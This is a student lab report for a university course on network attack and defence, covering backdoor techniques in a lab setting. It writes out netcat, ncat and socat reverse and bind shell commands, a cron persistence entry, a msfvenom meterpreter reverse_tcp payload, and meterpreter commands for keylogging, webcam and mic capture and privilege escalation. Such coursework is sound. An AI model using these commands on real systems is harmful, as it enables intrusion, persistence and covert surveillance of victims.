2019-2020-2 20175105王鑫浩 《网络对抗技术》Exp2 后门原理与实践

2019-2020-2 20175105王鑫浩 《网络对抗技术》Exp2 后门原理与实践

1.实验内容

任务一

(1)Linux获得Win Shell

输入ifconfig查看到kali的IP地址为192.168.87.132

输入nc -l -p 5105在Linux运行监听

windows在命令窗口进入ncat文件目录,输入ncat.exe -e cmd.exe 192.168.0.10 5303,使Windows反弹连接Linux

Linux下看到Windows的命令提示,可运行指令

(2)Win获得Linux Shell:

首先在Windows命令窗口中使用ipconfig查看主机IP地址 192.168.159.1

windows在ncat.exe文件目录下输入ncat.exe -l -p 5105打开windows 监听

Linux反弹连接windows:nc 192.168.159.1 5105 -e /bin/sh

windows下获得一个linux shell,可运行指令

(3)使用netcat获取主机操作Shell,cron启动

Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
crontab指令增加一条定时任务,"-e"表示编辑。

在kali端输入crontab -e,选择第二个编辑器,并添加3 * * * * /bin/netcat 192.168.3.27 5303 -e /bin/sh后保存退出,表示在每个小时的第3分钟执行后面的那条指令。

定时器设置完成


任务二 使用socat获取主机操作Shell, 任务计划启动

右击计算机—>点击计算机管理->点击任务计划程序—>点击创建任务

新建触发器

新建操作,在程序或脚本中选择socat.exe文件的路径,添加参数中填写tcp-listen:5105 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5105,同时把cmd.exe的stderr重定向到stdout上,然后确定

当时间到时,此时可以看到任务的状态为正在运行,同时会弹出一个cmd窗口。

在kali中输入指令socat - tcp:192.168.159.1:5105,成功获得了一个shell


任务三

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在Kali中使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.87.132 LPORT=5105 -f exe > 20175105_backdoor.exe命令生成20175105_backdoor.exe文件,其中LHOST是Kali的IP
在Windows下执行ncat.exe -lv 5105 > 20175105_backdoor.exe,使被控主机进入接收文件模式
在kali中执行nc 192.168.159.1 5105 < 20175105_backdoor.exe

MSF打开监听进程
输入msfconsole进入msf控制台
输入use exploit/multi/handler设置payload
输入set payload windows/meterpreter/reverse_tcp使用和生成后门程序时相同的payload
输入set LHOST 192.168.0.10,设置本地ip
输入set LPORT 5303设置本地端口
输入show options查看选项
输入exploit开始监听

在windows后门文件夹中运行后门程序
在kali端获取Windows的shell,可以输入dir来验证


任务四

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
使用record_mic指令获取目标机截获一段音频
使用webcam_snap指令获取目标机摄像头
使用keyscan_startkeyscan_dump指令获取目标机击键记录
使用screenshot指令获取目标机截图
使用getuid指令查看当前用户
使用getsystem指令进行提权操作


3.问题与解决

问题1:任务三传输后门文件时,未能找到文件。
解决:关闭杀毒软件后,即可找到。

4.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
不慎下载钓鱼网站中的软件,与其他软件捆绑安装等。

(2)例举你知道的后门如何启动起来(win及linux)的方式?
被攻击者自己执行、以及本次实验中使用的任务计划程序等

(3)Meterpreter有哪些给你映像深刻的功能?
截取音频、启动摄像头、提取权限

(4)如何发现自己有系统有没有被安装后门?
答:使用杀毒软件,检查进程、端口使用情况等。

5.实验总结与体会

答:在信息安全技术的课程中已经操作过一次类似实验,二者不同的是,信安更侧重于程序如何隐藏,网络对抗更侧重于其中原理,印象最深刻的是留下后门后,可以任意操作被攻击者的电子产品,Meterpreter的功能之强大,令人咋舌。

猜你喜欢

转载自www.cnblogs.com/wxhblogs/p/12549735.html